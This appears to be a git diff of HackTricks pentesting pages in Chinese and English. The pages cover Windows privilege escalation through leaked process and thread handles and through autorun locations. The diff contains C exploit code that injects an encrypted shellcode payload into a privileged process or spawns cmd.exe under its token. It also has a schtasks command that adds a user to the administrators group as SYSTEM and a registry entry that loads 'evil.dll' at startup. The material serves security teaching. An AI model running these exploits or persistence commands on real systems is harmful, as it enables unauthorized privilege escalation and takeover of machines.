+由于本节和前一节中提到的限制,从安全角度来看,始终**建议以尽可能低的完整性级别运行进程**。
### [WhiteIntel](https://whiteintel.io)
-[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**推动的搜索引擎,提供**免费**功能,用于检查公司或其客户是否已受到**窃取恶意软件**的**损害**。
+[**WhiteIntel**](https://whiteintel.io) 是一个**暗网**驱动的搜索引擎,提供**免费**功能以检查公司或其客户是否被**窃取恶意软件**所**危害**。
-WhiteIntel 的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
+WhiteIntel的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
-您可以在以下网址检查他们的网站并尝试他们的引擎,**免费**:
+你可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
+{% hint style="success" %}
+学习和实践 AWS 黑客技术:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客技术:[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
+支持 HackTricks
-支持 HackTricks 的其他方式:
-
-* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
-* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
-* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
-* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
+{% endhint %}
diff --git a/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md b/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
index f12b27b78..c2799e80f 100644
--- a/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
+++ b/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
@@ -1,37 +1,38 @@
-# 泄露句柄利用
+# Leaked Handle Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
+Support HackTricks
-支持HackTricks的其他方式:
-
-* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
-* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
-* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
-* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+{% endhint %}
-## 简介
+## Introduction
进程中的句柄允许**访问**不同的**Windows资源**:
-.png>)
+.png>)
-已经发生过几起**特权升级**案例,其中一个带有**打开且可继承句柄**的**特权进程**运行了一个**非特权进程**,使其能够**访问所有这些句柄**。
+已经有几个**特权提升**的案例,其中一个**特权进程**具有**打开和可继承的句柄**,并且**运行**了一个**无特权进程**,使其**访问所有这些句柄**。
-例如,想象一下**一个以SYSTEM身份运行的进程打开一个新进程**(`OpenProcess()`)并具有**完全访问权限**。同一个进程**还创建一个新进程**(`CreateProcess()`)**权限较低,但继承了主进程的所有打开句柄**。\
-然后,如果您对权限较低的进程**具有完全访问权限**,您可以获取使用`OpenProcess()`创建的**特权进程的打开句柄**并**注入shellcode**。
+例如,想象一下**一个以SYSTEM身份运行的进程打开一个新进程**(`OpenProcess()`)并具有**完全访问权限**。同一进程**还创建了一个新进程**(`CreateProcess()`),**具有低权限但继承了主进程的所有打开句柄**。\
+然后,如果你对低权限进程**具有完全访问权限**,你可以抓取**通过`OpenProcess()`创建的特权进程的打开句柄**并**注入一个shellcode**。
-## **有趣的句柄**
+## **Interesting Handles**
-### **进程**
+### **Process**
-如您在初始示例中所读,如果**非特权进程继承了具有足够权限的特权进程的进程句柄**,它将能够在其上执行**任意代码**。
+正如你在最初的例子中所读到的,如果一个**无特权进程继承了一个特权进程的句柄**,并且具有足够的权限,它将能够在其上执行**任意代码**。
-在[**这篇优秀的文章**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/)中,您可以看到如何利用具有以下权限之一的任何进程句柄:
+在[**这篇优秀的文章**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/)中,你可以看到如何利用任何具有以下权限的进程句柄:
* PROCESS\_ALL\_ACCESS
* PROCESS\_CREATE\_PROCESS
@@ -39,64 +40,64 @@
* PROCESS\_DUP\_HANDLE
* PROCESS\_VM\_WRITE
-### 线程
+### Thread
-与进程句柄类似,如果**非特权进程继承了具有足够权限的特权进程的线程句柄**,它将能够在其上执行**任意代码**。
+与进程句柄类似,如果一个**无特权进程继承了一个特权进程的线程句柄**,并且具有足够的权限,它将能够在其上执行**任意代码**。
-在[**这篇优秀的文章**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/)中,您还可以看到如何利用具有以下权限之一的任何进程句柄:
+在[**这篇优秀的文章**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/)中,你也可以看到如何利用任何具有以下权限的进程句柄:
* THREAD\_ALL\_ACCESS
* THREAD\_DIRECT\_IMPERSONATION
* THREAD\_SET\_CONTEXT
-### 文件、密钥和区段句柄
+### File, Key & Section Handles
-如果**非特权进程继承**具有**对特权文件或注册表的写入等效权限**的**句柄**,它将能够**覆盖**文件/注册表(并且有很多**运气**的话,**提升特权**)。
+如果一个**无特权进程继承了**一个**具有写入**等效**权限**的**句柄**,针对一个**特权文件或注册表**,它将能够**覆盖**该文件/注册表(并且在很多**运气**下,**提升特权**)。
-**区段句柄**类似于文件句柄,这些对象的常见名称是**"文件映射"**。它们用于处理**大文件**,而不必将整个文件保存在内存中。这使得利用有点类似于利用文件句柄。
+**Section Handles**类似于文件句柄,这类[对象的通用名称是**“文件映射”**](https://docs.microsoft.com/en-us/windows/win32/memory/file-mapping)。它们用于处理**大文件而不将整个**文件保留在内存中。这使得利用的方式与文件句柄的利用“相似”。
-## 如何查看进程的句柄
+## How to see handles of processes
### Process Hacker
-[**Process Hacker**](https://github.com/processhacker/processhacker)是一个可免费下载的工具。它具有几个令人惊叹的选项来检查进程,其中之一是**查看每个进程的句柄的功能**。
+[**Process Hacker**](https://github.com/processhacker/processhacker)是一个可以免费下载的工具。它有几个出色的选项来检查进程,其中之一是**查看每个进程的句柄的能力**。
-请注意,为了**查看所有进程的所有句柄,需要SeDebugPrivilege**(因此您需要以管理员身份运行Process Hacker)。
+请注意,为了**查看所有进程的所有句柄,需要SeDebugPrivilege**(因此你需要以管理员身份运行Process Hacker)。
-要查看进程的句柄,请右键单击进程并选择句柄:
+要查看进程的句柄,右键单击该进程并选择句柄:
.png>)
-然后,您可以右键单击句柄并**检查权限**:
+然后你可以右键单击句柄并**检查权限**:
.png>)
### Sysinternals Handles
-来自Sysinternals的[**Handles** ](https://docs.microsoft.com/en-us/sysinternals/downloads/handle)二进制文件还将在控制台中列出每个进程的句柄:
+[**Handles**](https://docs.microsoft.com/en-us/sysinternals/downloads/handle)来自Sysinternals的二进制文件也将在控制台中列出每个进程的句柄:
.png>)
### LeakedHandlesFinder
-[**此工具**](https://github.com/lab52io/LeakedHandlesFinder)允许您**监视**泄露的**句柄**,甚至**自动利用**它们以提升特权。
+[**这个工具**](https://github.com/lab52io/LeakedHandlesFinder)允许你**监控**泄漏的**句柄**,甚至**自动利用**它们来提升特权。
-### 方法论
+### Methodology
-现在您知道如何查找进程的句柄,您需要检查的是是否有**非特权进程可以访问特权句柄**。在这种情况下,进程的用户可能能够获取句柄并滥用它以提升特权。
+现在你知道如何找到进程的句柄,你需要检查的是是否有任何**无特权进程正在访问特权句柄**。在这种情况下,进程的用户可能能够获取该句柄并利用它来提升特权。
{% hint style="warning" %}
-之前提到过您需要SeDebugPrivilege才能访问所有句柄。但是**用户仍然可以访问其进程的句柄**,因此如果您想要从该用户提升权限,**以用户常规权限执行工具**可能会有用。
+之前提到过,你需要SeDebugPrivilege才能访问所有句柄。但是**用户仍然可以访问其进程的句柄**,因此如果你想仅从该用户进行特权提升,使用**用户的常规权限执行工具**可能会很有用。
```bash
handle64.exe /a | findstr /r /i "process thread file key pid:"
```
{% endhint %}
-## Vulnerable Example
+## 漏洞示例
-例如,以下代码属于一个**Windows服务**,可能存在漏洞。该服务二进制文件中的漏洞代码位于**`Exploit`**函数内。该函数开始**创建一个具有完全访问权限的新句柄进程**。然后,它**创建一个低特权进程**(通过复制_explorer.exe_的低特权令牌)执行_C:\users\username\desktop\client.exe_。**漏洞在于它将`bInheritHandles`设置为`TRUE`来创建低特权进程**。
+例如,以下代码属于一个**Windows服务**,该服务存在漏洞。该服务二进制文件的漏洞代码位于**`Exploit`**函数内部。该函数开始**创建一个具有完全访问权限的新句柄进程**。然后,它**创建一个低权限进程**(通过复制低权限的_explorer.exe_令牌)执行_C:\users\username\desktop\client.exe_。**漏洞在于它以`bInheritHandles`为`TRUE`创建低权限进程**。
-因此,这个低特权进程能够获取首先创建的高特权进程的句柄,并注入和执行一个 shellcode(请参阅下一节)。
+因此,这个低权限进程能够获取首先创建的高权限进程的句柄,并注入和执行shellcode(见下一节)。
```c
#include
#include
@@ -302,15 +303,15 @@ StartServiceCtrlDispatcher( serviceTable );
return 0;
}
```
-### 漏洞利用示例 1
+### Exploit Example 1
{% hint style="info" %}
-在实际情况中,您可能**无法控制**由易受攻击的代码执行的二进制文件(在本例中为_C:\users\username\desktop\client.exe_)。您可能会**入侵一个进程,然后需要查看是否可以访问任何特权进程的易受攻击句柄**。
+在实际场景中,您可能**无法控制将由易受攻击的代码执行的二进制文件**(在这种情况下为 _C:\users\username\desktop\client.exe_)。您可能会**妥协一个进程,并需要查看是否可以访问任何特权进程的易受攻击句柄**。
{% endhint %}
-在这个示例中,您可以找到一个可能的用于_C:\users\username\desktop\client.exe_的利用代码。\
-这段代码最有趣的部分位于`GetVulnProcHandle`中。此函数将**开始获取所有句柄**,然后它将**检查它们中是否有任何一个属于相同的PID**,以及句柄是否属于**进程**。如果所有这些要求都满足(找到了一个可访问的打开进程句柄),它将尝试**注入和执行一个利用进程句柄的shellcode**。\
-shellcode的注入是在**`Inject`**函数中完成的,它将**将shellcode写入特权进程中,并在同一进程中创建一个线程来执行shellcode**。
+在这个例子中,您可以找到针对 _C:\users\username\desktop\client.exe_ 的可能利用代码。\
+这段代码中最有趣的部分位于 `GetVulnProcHandle`。这个函数将**开始获取所有句柄**,然后**检查它们是否属于同一个 PID**,并且句柄是否属于一个**进程**。如果满足所有这些要求(找到一个可访问的打开进程句柄),它将尝试**注入并执行一个利用该进程句柄的 shellcode**。\
+shellcode 的注入是在 **`Inject`** 函数内部完成的,它将**在特权进程内部写入 shellcode,并在同一进程内部创建一个线程**来执行 shellcode。
```c
#include
#include
@@ -490,7 +491,6 @@ HANDLE hProc = NULL;
// AES encrypted shellcode spawning notepad.exe (ExitThread)
char key[] = { 0x49, 0xbc, 0xa5, 0x1d, 0xa7, 0x3d, 0xd6, 0x0, 0xee, 0x2, 0x29, 0x3e, 0x9b, 0xb2, 0x8a, 0x69 };
-```plaintext
unsigned char payload[] = { 0x6b, 0x98, 0xe8, 0x38, 0xaf, 0x82, 0xdc, 0xd4, 0xda, 0x57, 0x15, 0x48, 0x2f, 0xf0, 0x4e, 0xd3, 0x1a, 0x70, 0x6d, 0xbf, 0x53, 0xa8, 0xcb, 0xbb, 0xbb, 0x38, 0xf6, 0x4e, 0xee, 0x84, 0x36, 0xe5, 0x25, 0x76, 0xce, 0xb0, 0xf6, 0x39, 0x22, 0x76, 0x36, 0x3c, 0xe1, 0x13, 0x18, 0x9d, 0xb1, 0x6e, 0x0, 0x55, 0x8a, 0x4f, 0xb8, 0x2d, 0xe7, 0x6f, 0x91, 0xa8, 0x79, 0x4e, 0x34, 0x88, 0x24, 0x61, 0xa4, 0xcf, 0x70, 0xdb, 0xef, 0x25, 0x96, 0x65, 0x76, 0x7, 0xe7, 0x53, 0x9, 0xbf, 0x2d, 0x92, 0x25, 0x4e, 0x30, 0xa, 0xe7, 0x69, 0xaf, 0xf7, 0x32, 0xa6, 0x98, 0xd3, 0xbe, 0x2b, 0x8, 0x90, 0x0, 0x9e, 0x3f, 0x58, 0xed, 0x21, 0x69, 0xcb, 0x38, 0x5d, 0x5e, 0x68, 0x5e, 0xb9, 0xd6, 0xc5, 0x92, 0xd1, 0xaf, 0xa2, 0x5d, 0x16, 0x23, 0x48, 0xbc, 0xdd, 0x2a, 0x9f, 0x3c, 0x22, 0xdb, 0x19, 0x24, 0xdf, 0x86, 0x4a, 0xa2, 0xa0, 0x8f, 0x1a, 0xe, 0xd6, 0xb7, 0xd2, 0x6c, 0x6d, 0x90, 0x55, 0x3e, 0x7d, 0x9b, 0x69, 0x87, 0xad, 0xd7, 0x5c, 0xf3, 0x1, 0x7c, 0x93, 0x1d, 0xaa, 0x40, 0xf, 0x15, 0x48, 0x5b, 0xad, 0x6, 0xb5, 0xe5, 0xb9, 0x92, 0xae, 0x9b, 0xdb, 0x9a, 0x9b, 0x4e, 0x44, 0x45, 0xdb, 0x9f, 0x28, 0x90, 0x9e, 0x63, 0x23, 0xf2, 0xca, 0xab, 0xa7, 0x68, 0xbc, 0x31, 0xb4, 0xf9, 0xbb, 0x73, 0xd4, 0x56, 0x94, 0x2c, 0x63, 0x47, 0x21, 0x84, 0xa2, 0xb6, 0x91, 0x23, 0x8f, 0xa0, 0x46, 0x76, 0xff, 0x3f, 0x75, 0xd, 0x51, 0xc5, 0x70, 0x26, 0x1, 0xcf, 0x23, 0xbf, 0x97, 0xb2, 0x8d, 0x66, 0x35, 0xc8, 0xe3, 0x2, 0xf6, 0xbd, 0x44, 0x83, 0xf2, 0x80, 0x4c, 0xd0, 0x7d, 0xa3, 0xbd, 0x33, 0x8e, 0xe8, 0x6, 0xbc, 0xdc, 0xff, 0xe0, 0x96, 0xd9, 0xdc, 0x87, 0x2a, 0x81, 0xf3, 0x53, 0x37, 0x16, 0x3a, 0xcc, 0x3c, 0x34, 0x4, 0x9c, 0xc6, 0xbb, 0x12, 0x72, 0xf3, 0xa3, 0x94, 0x5d, 0x19, 0x43, 0x56, 0xa8, 0xba, 0x2a, 0x1d, 0x12, 0xeb, 0xd2, 0x6e, 0x79, 0x65, 0x2a };
unsigned int payload_len = sizeof(payload);
@@ -502,27 +502,27 @@ hProc = GetVulnProcHandle();
if ( hProc != NULL) {
-// 解密 payload
+// d#Decrypt payload
AESDecrypt((char *) payload, payload_len, key, sizeof(key));
-printf("[+] 发送礼物...");
-// 注入并在特权上下文中运行 payload
+printf("[+] Sending gift...");
+// Inject and run the payload in the privileged context
Inject(hProc, payload, payload_len);
-printf("完成。\n");
+printf("done.\n");
}
getchar();
return 0;
}
```
-### 漏洞利用示例 2
+### Exploit Example 2
{% hint style="info" %}
-在实际情况中,您可能**无法控制**由易受攻击的代码执行的二进制文件(在本例中为_C:\users\username\desktop\client.exe_)。您可能会** compromise 一个进程,然后需要查看是否可以访问任何特权进程的易受攻击句柄**。
+在实际场景中,您可能**无法控制将由易受攻击的代码执行的二进制文件**(在这种情况下为 _C:\users\username\desktop\client.exe_)。您可能会**妥协一个进程,并需要查看是否可以访问任何特权进程的易受攻击的句柄**。
{% endhint %}
-在这个示例中,**不是滥用打开的句柄来注入**和执行 shellcode,而是**使用特权打开句柄进程的令牌来创建一个新的**。这是在第 138 至 148 行完成的。
+在这个例子中,**不是滥用打开的句柄来注入**和执行 shellcode,而是**使用特权打开句柄进程的令牌来创建一个新的句柄**。这在第 138 行到 148 行中完成。
-请注意,**函数 `UpdateProcThreadAttribute`** 是与**属性 `PROC_THREAD_ATTRIBUTE_PARENT_PROCESS` 和打开的特权进程句柄**一起使用的。这意味着**执行 \_cmd.exe 的创建的进程线程**\*\* 将具有与打开句柄进程相同的令牌特权\*\*。
+注意**函数 `UpdateProcThreadAttribute`**是如何与**属性 `PROC_THREAD_ATTRIBUTE_PARENT_PROCESS` 和打开的特权进程的句柄**一起使用的。这意味着**创建的进程线程执行 \_cmd.exe**\_\*\*将具有与打开句柄进程相同的令牌权限\*\*。
```c
#include
#include
@@ -687,28 +687,29 @@ return 0;
* [**https://github.com/lab52io/LeakedHandlesFinder**](https://github.com/lab52io/LeakedHandlesFinder)
-该工具允许您监视泄漏的句柄以查找易受攻击的句柄,甚至可以自动利用它们。它还具有一个用于泄漏句柄的工具。
+该工具允许您监控泄漏的句柄,以找到易受攻击的句柄,甚至可以自动利用它们。它还提供了一个泄漏句柄的工具。
* [**https://github.com/abankalarm/ReHacks/tree/main/Leaky%20Handles**](https://github.com/abankalarm/ReHacks/tree/main/Leaky%20Handles)
-另一个用于泄漏句柄并利用它的工具。
+另一个泄漏句柄并利用它的工具。
-## 参考资料
+## 参考文献
* [http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/)
* [https://github.com/lab52io/LeakedHandlesFinder](https://github.com/lab52io/LeakedHandlesFinder)
* [https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html](https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html)
+{% hint style="success" %}
+学习和实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-从零开始学习AWS黑客技术 htARTE(HackTricks AWS Red Team Expert)!
+支持 HackTricks
-支持HackTricks的其他方式:
-
-* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
-* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
-* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
-* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
+{% endhint %}
diff --git a/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md b/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
index 571377ad3..8dfe92ddc 100644
--- a/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
+++ b/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
@@ -1,35 +1,36 @@
-# 使用 Autoruns 进行权限提升
+# Privilege Escalation with Autoruns
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家)!
+Support HackTricks
-支持 HackTricks 的其他方式:
-
-- 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-- 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
-- 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
-- **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live) 上 **关注**我们。
-- 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享您的黑客技巧**。
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+{% endhint %}
-**漏洞赏金提示**:**注册** Intigriti,这是一家由黑客创建的高级**漏洞赏金平台**!立即加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
+**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
## WMIC
-**Wmic** 可用于在**启动**时运行程序。查看在启动时编程运行的二进制文件:
+**Wmic** 可以用来在 **启动时** 运行程序。查看哪些二进制文件被编程为在启动时运行:
```bash
wmic startup get caption,command 2>nul & ^
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
```
-## 计划任务
+## 定时任务
-**任务**可以按照**特定频率**进行调度运行。查看已安排运行的二进制文件:
+**任务**可以按**特定频率**安排运行。查看哪些二进制文件被安排运行:
```bash
schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab"
schtasks /query /fo LIST 2>nul | findstr TaskName
@@ -40,9 +41,9 @@ Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,Tas
#You can also write that content on a bat file that is being executed by a scheduled task
schtasks /Create /RU "SYSTEM" /SC ONLOGON /TN "SchedPE" /TR "cmd /c net localgroup administrators user /add"
```
-## 文件夹
+## Folders
-**启动文件夹中的所有二进制文件将在启动时执行**。常见的启动文件夹如下所示,但启动文件夹在注册表中有指示。[阅读此处以了解位置。](privilege-escalation-with-autorun-binaries.md#startup-path)
+所有位于 **启动文件夹** 的二进制文件将在启动时执行。常见的启动文件夹如下所示,但启动文件夹在注册表中指示。[阅读此以了解位置。](privilege-escalation-with-autorun-binaries.md#startup-path)
```bash
dir /b "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul
dir /b "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul
@@ -54,12 +55,12 @@ Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
## 注册表
{% hint style="info" %}
-[从这里注释](https://answers.microsoft.com/en-us/windows/forum/all/delete-registry-key/d425ae37-9dcc-4867-b49c-723dcd15147f): **Wow6432Node** 注册表项表示您正在运行 64 位 Windows 版本。操作系统使用此键为在 64 位 Windows 版本上运行的 32 位应用程序显示 HKEY_LOCAL_MACHINE\SOFTWARE 的单独视图。
+[此处的说明](https://answers.microsoft.com/en-us/windows/forum/all/delete-registry-key/d425ae37-9dcc-4867-b49c-723dcd15147f): **Wow6432Node** 注册表项表示您正在运行 64 位 Windows 版本。操作系统使用此键为在 64 位 Windows 版本上运行的 32 位应用程序显示 HKEY\_LOCAL\_MACHINE\SOFTWARE 的单独视图。
{% endhint %}
### 运行
-**常见的** AutoRun 注册表:
+**常见的** AutoRun 注册表:
* `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce`
@@ -73,9 +74,9 @@ Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
* `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Runonce`
* `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunonceEx`
-被称为 **Run** 和 **RunOnce** 的注册表键旨在每次用户登录系统时自动执行程序。作为键数据值分配的命令行限制为 260 个字符或更少。
+被称为 **Run** 和 **RunOnce** 的注册表键旨在每次用户登录系统时自动执行程序。分配给键的数据值的命令行限制为 260 个字符或更少。
-**服务运行** (可以控制系统启动时服务的自动启动):
+**服务运行**(可以控制启动时服务的自动启动):
* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
@@ -91,16 +92,16 @@ Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
* `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx`
* `HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx`
-在 Windows Vista 及更高版本中,**Run** 和 **RunOnce** 注册表键不会自动生成。这些键中的条目可以直接启动程序或将它们指定为依赖项。例如,要在登录时加载 DLL 文件,可以使用 **RunOnceEx** 注册表键以及一个 "Depend" 键。通过添加一个注册表项来在系统启动时执行 "C:\temp\evil.dll" 来演示这一点:
+在 Windows Vista 及更高版本中,**Run** 和 **RunOnce** 注册表键不会自动生成。这些键中的条目可以直接启动程序或将其指定为依赖项。例如,要在登录时加载 DLL 文件,可以使用 **RunOnceEx** 注册表键以及一个 "Depend" 键。这通过添加一个注册表项来演示,在系统启动时执行 "C:\temp\evil.dll":
```
reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d "C:\\temp\\evil.dll"
```
{% hint style="info" %}
-**Exploit 1**:如果您可以在**HKLM**中的任何提到的注册表中写入内容,则可以在不同用户登录时提升权限。
+**Exploit 1**: 如果您可以在 **HKLM** 中的任何提到的注册表项内写入,您可以在不同用户登录时提升权限。
{% endhint %}
{% hint style="info" %}
-**Exploit 2**:如果您可以覆盖**HKLM**中任何注册表中指定的任何二进制文件,则可以在不同用户登录时修改该二进制文件并提升权限。
+**Exploit 2**: 如果您可以覆盖 **HKLM** 中任何注册表项上指示的任何二进制文件,您可以在不同用户登录时用后门修改该二进制文件并提升权限。
{% endhint %}
```bash
#CMD
@@ -164,10 +165,10 @@ Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\Ru
* `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders`
* `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders`
-放置在**启动**文件夹中的快捷方式将在用户登录或系统重新启动期间自动触发服务或应用程序的启动。**启动**文件夹的位置在注册表中为**本地计算机**和**当前用户**范围定义。这意味着添加到这些指定**启动**位置的任何快捷方式都将确保链接的服务或程序在登录或重新启动过程后启动,这是一种安排程序自动运行的简单方法。
+放置在**启动**文件夹中的快捷方式将在用户登录或系统重启时自动触发服务或应用程序启动。**启动**文件夹的位置在注册表中为**本地计算机**和**当前用户**范围定义。这意味着添加到这些指定**启动**位置的任何快捷方式都将确保链接的服务或程序在登录或重启过程后启动,使其成为安排程序自动运行的简单方法。
{% hint style="info" %}
